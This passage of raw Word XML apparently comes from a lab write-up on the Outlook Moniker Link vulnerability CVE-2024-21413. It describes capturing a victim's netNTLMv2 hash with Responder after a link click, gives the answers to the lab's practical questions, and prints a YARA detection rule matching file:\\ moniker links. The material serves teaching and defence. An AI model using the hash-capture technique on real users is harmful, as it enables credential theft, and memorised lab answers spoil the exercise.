            <wp:extent cx="5722620" cy="2705100"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1066921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2620" cy="2705100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A73F64" w:rsidRPr="00A73F64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A73F64" w:rsidRPr="00A73F64">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41E34B10" wp14:editId="39B7EE3F">
            <wp:extent cx="5731510" cy="2440305"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="16219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93280" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2440305"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00F9762D" w:rsidRPr="00F9762D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9762D" w:rsidRPr="00F9762D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74F78FF6" wp14:editId="16823306">
            <wp:extent cx="5731510" cy="2889885"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5715"/>
            <wp:docPr id="46135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58308" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2889885"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAC27B0" w14:textId="5634F7B0" w:rsidR="00ED0607" w:rsidRDefault="00ED0607" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED0607">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Click on the "Click me" hyperlink and return to our "Responder" terminal session on the AttackBox:</w:t>
      </w:r>
      <w:r w:rsidR="00F974C1" w:rsidRPr="00F974C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F974C1" w:rsidRPr="00F974C1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DD402DF" wp14:editId="64F1E8E3">
            <wp:extent cx="5731510" cy="1558290"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="13100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3274" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1558290"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BB7881" w14:textId="495018A0" w:rsidR="00295D37" w:rsidRDefault="00DA2356" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA2356">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="101B080B" wp14:editId="3D75355B">
            <wp:extent cx="5731510" cy="2557780"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7455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41924" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2557780"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00762E21" w:rsidRPr="00762E21">
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro" w:hAnsi="Source Sans Pro"/>
          <w:color w:val="151C2B"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00762E21" w:rsidRPr="00762E21">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Success! The victim's netNTLMv2 hash has been captured on our AttackBox.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D5F156" w14:textId="0C736528" w:rsidR="00F654EC" w:rsidRDefault="00F654EC" w:rsidP="00226E70">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Practical:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC460B1" w14:textId="77777777" w:rsidR="00F654EC" w:rsidRDefault="00F654EC" w:rsidP="00F654EC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F654EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>What is the name of the application that we use on the AttackBox to capture the user's hash?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACC4B53" w14:textId="0BEE5B43" w:rsidR="000B0168" w:rsidRPr="00F654EC" w:rsidRDefault="000B0168" w:rsidP="00F654EC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B0168">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BE4FBA" w14:textId="77777777" w:rsidR="00F654EC" w:rsidRPr="00F654EC" w:rsidRDefault="00F654EC" w:rsidP="00F654EC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F654EC">
        <w:rPr>
          <w:noProof/>
          <w:vanish/>
        </w:rPr>
        <w:t>Top of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A46645" w14:textId="77777777" w:rsidR="00F654EC" w:rsidRPr="00F654EC" w:rsidRDefault="00F654EC" w:rsidP="00F654EC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:vanish/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F654EC">
        <w:rPr>
          <w:noProof/>
          <w:vanish/>
        </w:rPr>
        <w:t>Bottom of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F4305F" w14:textId="77777777" w:rsidR="00F654EC" w:rsidRPr="00F654EC" w:rsidRDefault="00F654EC" w:rsidP="00F654EC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F654EC">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>What type of hash is captured once the hyperlink in the email has been clicked?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0750C" w14:textId="667CB704" w:rsidR="00F654EC" w:rsidRDefault="002B565B" w:rsidP="00F654EC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002B565B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>netNTLMv2</w:t>
      </w:r>
      <w:r w:rsidR="00F654EC" w:rsidRPr="00F654EC">
        <w:rPr>
          <w:noProof/>
          <w:vanish/>
        </w:rPr>
        <w:t>Top of Form</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAC9179" w14:textId="77777777" w:rsidR="006922EB" w:rsidRDefault="006922EB" w:rsidP="00F654EC">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="382E0E3F" w14:textId="071EDA90" w:rsidR="006922EB" w:rsidRDefault="006922EB" w:rsidP="006922EB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006922EB">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E70766F" w14:textId="77777777" w:rsidR="00D47D3B" w:rsidRPr="00D47D3B" w:rsidRDefault="00D47D3B" w:rsidP="00D47D3B">
      <w:r w:rsidRPr="00D47D3B">
        <w:t>YARA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7C773D" w14:textId="77777777" w:rsidR="00D47D3B" w:rsidRPr="00D47D3B" w:rsidRDefault="00D47D3B" w:rsidP="00D47D3B">
      <w:r w:rsidRPr="00D47D3B">
        <w:t>A </w:t>
      </w:r>
      <w:hyperlink r:id="rId34" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D47D3B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Yara rule</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D47D3B">
        <w:t> has been created by </w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00D47D3B">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Florian Roth</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D47D3B">
        <w:t> to detect emails containing the file:\\ element in the Moniker Link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BA03CB" w14:textId="77777777" w:rsidR="00D47D3B" w:rsidRDefault="00D47D3B" w:rsidP="00D47D3B"/>
    <w:p w14:paraId="29EFBDCC" w14:textId="77777777" w:rsidR="00E958AB" w:rsidRDefault="00E958AB" w:rsidP="00D47D3B"/>
    <w:p w14:paraId="58B4D5EF" w14:textId="77777777" w:rsidR="00E958AB" w:rsidRDefault="00E958AB" w:rsidP="00D47D3B"/>
    <w:p w14:paraId="63250D7C" w14:textId="77777777" w:rsidR="00E958AB" w:rsidRDefault="00E958AB" w:rsidP="00D47D3B"/>
    <w:p w14:paraId="09277867" w14:textId="662E9462" w:rsidR="00E958AB" w:rsidRPr="00D47D3B" w:rsidRDefault="003840B7" w:rsidP="00D47D3B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23FF7408" wp14:editId="5A18EB51">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>137160</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-220980</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5577840" cy="9593580"/>
                <wp:effectExtent l="0" t="0" r="22860" b="26670"/>
                <wp:wrapNone/>
                <wp:docPr id="1718928207" name="Text Box 6"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5577840" cy="9593580"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:schemeClr val="accent3">
                            <a:lumMod val="40000"/>
                            <a:lumOff val="60000"/>
                          </a:schemeClr>
                        </a:solidFill>
                        <a:ln w="6350">
                          <a:solidFill>
                            <a:schemeClr val="accent1">
                              <a:lumMod val="40000"/>
                              <a:lumOff val="60000"/>
                            </a:schemeClr>
                          </a:solidFill>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="405B7F0D" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>user@yourmachine</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">:# cat cve-2024-21413.yar </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1125D9E9" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="74257E5B" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="5D6D6A89" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>rule EXPL_CVE_2024_21413_Microsoft_Outlook_RCE_Feb24 {</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="499CDED0" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="221CB19F" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">   meta:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="41D6F55B" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="6E8F80AB" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      description = "Detects emails that contain signs of a method to exploit CVE-2024-21413 in Microsoft Outlook"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="12480D72" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="7138827D" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      author = "</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>X__Junior</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>, Florian Roth"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1FF2D878" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="42672C2A" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      reference = "https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability/"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0B16266C" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="6BCCA492" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      date = "2024-02-17"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="24D25CBE" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="353CA77C" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      modified = "2024-02-19"</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="72F21E4E" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4D818382" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      score = 75</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7C9EDEBA" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="75D370DD" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">   strings:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4B9DD2AF" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="00A85BEB" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      $a1 = "Subject: "</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="55DAFFC4" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="4D92E14A" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      $a2 = "Received: "</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="16D9A615" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="36C53112" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="45F85748" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="63393388" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      $xr1 = /file:\/\/\/\\\\[^"']{6,600}\.(docx|txt|pdf|xlsx|pptx|odt|etc|jpg|png|gif|bmp|tiff|svg|mp4|avi|mov|wmv|flv|mkv|mp3|wav|aac|flac|ogg|wma|exe|msi|bat|cmd|ps1|zip|rar|7z|targz|iso|dll|sys|ini|cfg|reg|html|css|java|py|c|cpp|db|sql|mdb|accdb|sqlite|eml|pst|ost|mbox|htm|php|asp|jsp|xml|ttf|otf|woff|woff2|rtf|chm|hta|js|lnk|vbe|vbs|wsf|xls|xlsm|xltm|xlt|doc|docm|dot|dotm)!/</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="247AC219" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="1474FCD2" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">   condition:</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6713BF8E" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="7BA89E6C" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t>filesize</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve"> &lt; 1000KB</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0ED28E66" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="3EAD8797" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="003B68F4">
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                              <w:t xml:space="preserve">      and all of ($a*)</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="22378FF6" w14:textId="77777777" w:rsidR="003B68F4" w:rsidRPr="003B68F4" w:rsidRDefault="003B68F4" w:rsidP="003B68F4">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                                <w:bCs/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
